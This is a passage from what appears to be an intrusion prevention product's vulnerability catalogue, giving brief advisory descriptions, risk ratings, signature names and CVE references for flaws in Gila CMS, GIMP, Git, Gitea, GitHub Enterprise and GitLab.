Gila-CMS-DeleteAction-Local-File-Inclusion

About this vulnerability:

A vulnerability in Gila CMS Gila

Risk:

High

First detected in:

sgpkg-ips-1222-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gila CMS

Type:

Directory Traversal

Description:

A local file inclusion vulnerability has been reported in Gila CMS. The vulnerability is due to improper sanitization of user supplied data in the function deleteAction(). A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation of the vulnerability could lead to arbitrary code execution under the security context of the service.

Situation:

HTTP_CRL-Gila-CMS-DeleteAction-Local-File-Inclusion

References:

CVE-2020-5513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5513

Gila-CMS-Image-Upload-Remote-Code-Execution

About this vulnerability:

A vulnerability in Gila CMS Gila

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gila CMS

Type:

Input Validation

Description:

Improper validation of received files during image upload causes a vulnerability in Gila CMS. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

HTTP_CSU-Gila-CMS-Image-Upload-Remote-Code-Execution

References:

CVE-2020-5514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5514

Gila-CMS-Media-assets.php-Path-Traversal

About this vulnerability:

A vulnerability in Gila CMS

Risk:

Moderate

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gila CMS

Type:

Directory Traversal

Description:

There has been reported a path traversal vulnerability in Gila CMS. Successful exploitation could lead in information disclosure.

Situation:

HTTP_CS-Gila-CMS-Media-assets.php-Path-Traversal

References:

CVE-2020-5512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5512

GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in GIMP

Risk:

High

First detected in:

sgpkg-ips-1684-5242

Last changed:

sgpkg-ips-1684-5242

Platform:

Generic

Software:

GIMP

Type:

Integer Overflow

Description:

A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to improper handling of PSP files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious image. Successful exploitation could result in arbitrary code execution under the context of the user.

Situation:

File-Binary_GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow

References:

CVE-2023-44443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44443

GIMP-script-fu-Server-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in the readstr_upto function in GIMP script-fu detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GIMP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the readstr_upto function in GIMP script-fu, versions 2.6.12 and before and possibly 2.6.13, which allows remote attackers to execute arbitrary code via a long string in a command to the script-fu server.

Situation:

Generic_CS-GIMP-script-fu-Server-Buffer-Overflow

References:

CVE-2012-2763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2763

BID-53741
http://www.securityfocus.com/bid/53741

OSVDB-82429
http://www.osvdb.org/82429

GIMP-XWD-File-Handling-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU GIMP

Risk:

Moderate

First detected in:

sgpkg-ips-556-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GIMP

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability leading to code execution has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to insufficient validation of certain fields while parsing XWD files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious XWD file. Successful exploitation could result in injection and execution of arbitrary code, within the security context of the current logged in user. The behaviour of the target would depend on the intention of the malicious code. If code injection is not successful, the affected application will terminate abnormally.

Situation:

File-Binary_GIMP-XWD-File-Handling-Heap-Buffer-Overflow

References:

CVE-2013-1978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1978

GIMP-XWD-File-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU GIMP

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GIMP

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in GNU Image Manipulation Program (GIMP). The vulnerability is due to insufficient validation of certain fields while parsing XWD files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious XWD file. Successful exploitation could result in injection and execution of arbitrary code, within the security context of the current logged in user. The behaviour of the target would depend on the intention of the malicious code. If code injection is not successful, the affected application will terminate abnormally.

Situation:

File-Binary_GIMP-XWD-File-Handling-Stack-Buffer-Overflow

References:

CVE-2012-5576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5576

BID-56647
http://www.securityfocus.com/bid/56647

OSVDB-87792
http://www.osvdb.org/87792

Git-Client-Path-Validation-Command-Execution

About this vulnerability:

A vulnerability in GIT GIT

Risk:

Low

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Git

Type:

Input Validation

Description:

A command execution vulnerability exists in the Git client. The vulnerability is due to insufficient validation of allowed check-in paths. A malicious attacker can overwrite the contents of the '.git/' directory when the repository is cloned from an operating system with a case insensitive file system. Contents of '.git/' can be used to execute arbitrary commands on the system. A remote attacker could exploit this vulnerability by enticing a user to checkout a crafted git repository, or by checking-in maliciously crafted commits to a vulnerable host. Successful exploitation could result in command execution in the context of the currently logged in user.

Situation:

File-Binary_Git-Client-Path-Validation-Command-Execution

References:

CVE-2014-9390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390

OSVDB-116041
http://www.osvdb.org/116041

Git-Git-Source-Code-Management-gitattributes-Integer-Overflow

About this vulnerability:

A vulnerability in Git Source Code Management.

Risk:

High

First detected in:

sgpkg-ips-1575-5242

Last changed:

sgpkg-ips-1575-5242

Platform:

Generic

Software:

Git

Type:

Integer Overflow

Description:

A vulnerability in Git Source Code Management, multiple versions, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository, due to improper handling of gitattributes files with a large number of attributes defined.

Situation:

HTTP_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
Generic_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow

References:

CVE-2022-23521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23521

Git-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955

About this vulnerability:

A vulnerability in Git LFS.

Risk:

High

First detected in:

sgpkg-ips-1398-5242

Last changed:

sgpkg-ips-1398-5242

Platform:

Windows

Software:

Git LFS

Type:

Malfunction

Description:

A vulnerability in Git LFS, versions 2.12 and before, which allows remote attackers to execute arbitary code by enticing a victim to clone a malicious repository.

Situation:

File-Binary_DGit-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955

References:

CVE-2020-27955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27955

Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Git

Risk:

Moderate

First detected in:

sgpkg-ips-1604-5242

Last changed:

sgpkg-ips-1604-5242

Platform:

Generic

Software:

Git

Type:

Malfunction

Description:

An arbitrary file overwrite vulnerability has been reported in Git. The vulnerability is due to a design weakness when git apply is run with the --reject option. A remote attacker could exploit this vulnerability by enticing a target user to apply a malicious patch using the --reject option. Successful exploitation could result in arbitrary file overwrite in the target user's system.

Situation:

File-Text_Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write

References:

CVE-2023-25652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25652

Git-Source-Code-Management-Clone_submodule-Link-Following

About this vulnerability:

A vulnerability in Git

Risk:

High

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

Git

Type:

Input Validation

Description:

A link following vulnerability has been reported for Git Source Code Management. This vulnerability is due to improper handling of symlinks when recursively cloning a git repository containing submodules. A remote attacker could exploit this vulnerability by enticing a user to clone a malicious repository. Successfully exploiting this vulnerability could result in remote code execution in the security context of the git process.

Situation:

Generic_SS-Suspicious-Git-Packfile-In-Server-Response

References:

CVE-2024-32002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32002

Git-Source-Code-Management-Improper-Link-Resolution

About this vulnerability:

A vulnerability in Git Source Code Management.

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

Git

Type:

Malfunction

Description:

A vulnerability in Git Source Code Management, versions 2.14.2 and after prior to 2.30.2, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository, due to improper validation of file system resource type prior to performing a file write operation.

Situation:

File-Binary_Git-Source-Code-Management-Improper-Link-Resolution

References:

CVE-2021-21300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21300

Git-SSH-Url-Processing-Command-Execution

About this vulnerability:

A vulnerability in GIT GIT

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Git

Type:

Input Validation

Description:

There exists a command execution vulnerability in the Git client. A successful exploitation could lead to arbitrary code execution on the target system.

Situation:

File-Binary_Git-SSH-Url-Processing-Command-Execution

References:

CVE-2017-1000117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117

Git-Submodules-Directory-Traversal

About this vulnerability:

A vulnerability in GIT

Risk:

High

First detected in:

sgpkg-ips-1136-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Git

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in the Git client. The vulnerability is due to insufficient validation of submodule names in the .gitmodules file during checkout. A malicious attacker could exploit this vulnerability by convincing a user to checkout a specially crafted git repository. Successful exploitation will enable the attacker to execute arbitrary scripts on the target system.

Situation:

Generic_SS-Git-Submodules-Directory-Traversal
File-Binary_Git-Submodules-Directory-Traversal

References:

CVE-2018-11235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235

Gitea-Git-Hooks-Remote-Code-Execution

About this vulnerability:

A vulnerability in Gitea.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Unix; Linux; Windows

Software:

Gitea

Type:

Input Validation

Description:

A vulnerability in Gitea, version 1.13.0, which allows remote attackers to execute arbitrary code by setting a post-receive git hook with a payload.

Situation:

HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution

References:

CVE-2020-14144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14144

GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability

About this vulnerability:	A Github Enterprise Default Session Secret And Deserialization vulnerability
Risk:	High
First detected in:	sgpkg-ips-1020-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows; Linux; Mac OS X
Software:	Github
Type:	Input Validation
Description:	A vulnerability in Github Enterprise, versions 2.8.0 - 2.8.6, which allows remote attackers to retrieve a hard-coded secret value and sign malicious ruby objects.
Situation:	HTTP_CSH-GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability

GitHub-Enterprise-Saml-Authentication-Bypass-CVE-2024-9487

About this vulnerability:

An attempt to exploit a vulnerability in GitHub detected

Risk:

High

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Github

Type:

Input Validation

Description:

An improper verification of cryptographic signature vulnerability was identified in GitHub Enterprise Server that allowed SAML SSO authentication to be bypassed, resulting in unauthorized provisioning of users and access to the instance. Exploitation required the encrypted assertions feature to be enabled, and the attacker would require direct network access as well as a signed SAML response or metadata document. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.15 and was fixed in versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2.

Situation:

HTTP_CRL-Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting

References:

CVE-2024-9487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9487

Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1737-5242

Last changed:

sgpkg-ips-1737-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A cross site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper user input validation. A remote attacker could exploit this vulnerabilities by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

References:

CVE-2023-6371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6371

Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028

About this vulnerability:

A vulnerability in GitLab

Risk:

High

First detected in:

sgpkg-ips-1675-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

GitLab

Type:

Malfunction

Description:

An account hijacking vulnerability has been reported in GitLab. An unauthenticated attacker can provide arbitrary email addresses for the user account password reset functionality, allowing for a complete takeover of any existing GitLab account.

Situation:

HTTP_CRL-Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028

References:

CVE-2023-7028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7028

Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825

About this vulnerability:

An attempt to exploit a vulnerability in GitLab detected

Risk:

High

First detected in:

sgpkg-ips-1593-5242

Last changed:

sgpkg-ips-1593-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

This is a critical issue in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.

Situation:

HTTP_CRL-Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825

References:

CVE-2023-2825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2825

Gitlab-Arbitrary-File-Write

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in GitLab. The vulnerability is due to insufficient validation of imported GitLab projects. An authenticated, remote attacker can exploit this vulnerability by importing crafted GitLab projects. Successful exploitation could result in the creation or overwriting of files writeable by the user running GitLab, leading to the possibility of arbitrary code execution.

Situation:

File-Binary_Gitlab-Arbitrary-File-Write

References:

CVE-2018-14364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14364

Gitlab-Branch-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1387-5242

Last changed:

sgpkg-ips-1387-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

Improper input validation of the default branch name in some types of requests causes a cross-site scripting vulnerability in GitLab. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Gitlab-Branch-Name-Stored-Cross-Site-Scripting

References:

CVE-2021-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22241

Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878

About this vulnerability:

A vulnerability in GitLab

Risk:

High

First detected in:

sgpkg-ips-1751-5242

Last changed:

sgpkg-ips-1751-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A regular expression denial of service (ReDoS) vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in a regular expression that processes Branch Search search strings. An unauthenticated, remote attacker could exploit this vulnerability by submitting a malicious project file search request to the target server. Successfully exploiting this vulnerability could result in a denial of service condition for the target system.

Situation:

HTTP_CSU-Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878

References:

CVE-2024-2878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2878

Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

GitLab

Type:

Malfunction

Description:

A regular expression denial of service (ReDoS) vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in a regular expression that processes markdown URL strings. An unauthenticated, remote attacker could exploit this vulnerability by submitting or previewing malicious markdown text on the target server. Successfully exploiting this vulnerability could result in denial of service of the target system.

Situation:

File-Text_Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service

References:

CVE-2023-3364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3364

Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1623-5242

Last changed:

sgpkg-ips-1623-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A denial-of-service vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of large label description that could saturate CPU usage. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests repeatedly to the target server. Successful exploitation could result in denial-of-service condition on the target server.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service

References:

CVE-2023-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0921

Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab.

Risk:

High

First detected in:

sgpkg-ips-1424-5242

Last changed:

sgpkg-ips-1424-5242

Platform:

Generic

Software:

GitLab

Type:

Cross-site Scripting

Description:

A vulnerability in GitLab Community and Enterprise editions, versions 14.2.x prior to 14.2.6, 14.3.x prior to 14.3.4, and 14.4.x prior to 14.4.1, which allows remote attackers to execute arbitrary scripts in the targets browser, du to insufficient input sanitization of ipynb files.

Situation:

HTTP_CS-Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting

References:

CVE-2021-39906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39906

Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1744-5242

Last changed:

sgpkg-ips-1744-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A design weakness in a regular expression that processes FileFinder search strings causes a denial of service vulnerability in Gitlab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service

References:

CVE-2024-2829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2829

Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1538-5242

Last changed:

sgpkg-ips-1541-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported for GitLab GitHub imports. The vulnerability is due to due to improper handling of the data returned while running the import. A remote, authenticated attacker can exploit this vulnerability by initiating a GitHub import on a target server to an attacker controlled GitHub server. Successful exploitation could result in the execution of arbitrary commands in the security context of the Redis service on the target server. This situation also detects CVE-2022-2992.

Situation:

File-Text_Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution

References:

CVE-2022-2884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884

Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A design weakness in the regular expression that processes glm_source causes a vulnerability in GitLab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service

References:

CVE-2024-8124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8124

Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS

About this vulnerability:

A vulnerability in GitLab, GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1586-5242

Last changed:

sgpkg-ips-1586-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A cross site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of user input of kroki diagrams. A remote, authenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS

References:

CVE-2023-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0050

Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in the Community Edition and Enterprise Edition of GitLab. The vulnerability is due to improper input validation of label colors. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation could result in the execution of script code in the security context of a target user's browser.

Situation:

File-Text_Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting

References:

CVE-2022-3265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3265

Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1758-5242

Last changed:

sgpkg-ips-1758-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling markdown rendering. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service

References:

CVE-2024-2651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2651

Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

Improper escaping of branch names when displaying the branch name in merge requests causes a cross-site scripting vulnerability in GitLab. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS

References:

CVE-2023-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2442

Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1483-5242

Last changed:

sgpkg-ips-1483-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper sanitization of user input submitted in milestone references. A remote, authenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS

References:

CVE-2022-1190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1190

Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper sanitization of user input submitted in notes. A remote, authenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting

References:

CVE-2022-1175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1758-5242

Last changed:

sgpkg-ips-1758-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling the user pin menu.

Situation:

File-Text_Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service

References:

CVE-2024-2454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2454

Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

Improper validation of user input causes a cross-site scripting vulnerability in GitLab. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS

References:

CVE-2024-1451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1451

Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1768-5242

Last changed:

sgpkg-ips-1768-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling runner descriptions. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

File-Text_Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service

References:

CVE-2024-2874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2874

Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1796-5242

Last changed:

sgpkg-ips-1796-5242

Platform:

Generic

Software:

GitLab

Type:

Malfunction

Description:

Improper SAML authentication verification causes an authentication bypass vulnerability in GitLab. A successful exploitation allows an attacker to elevate their privileges an access restricted information.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass

References:

CVE-2024-45409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45409

Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1637-5242

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

GitLab

Type:

Malfunction

Description:

A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in the vscode-mediator-commands package. A remote attacker could exploit this vulnerability by submitting malicious markdown text on the target server that is then interacted with in the Web IDE. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting

References:

CVE-2023-2164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2164

Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab

Risk:

High

First detected in:

sgpkg-ips-1782-5242

Last changed:

sgpkg-ips-1782-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to insufficient input validation when importing GitLab projects. A remote, authenticated attacker could exploit this vulnerability by importing a crafted project export. Successfully exploiting this vulnerability could result in code execution in the context of the victim's browser.

Situation:

HTTP_CS-Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting

References:

CVE-2024-4901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4901

Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

GitLab

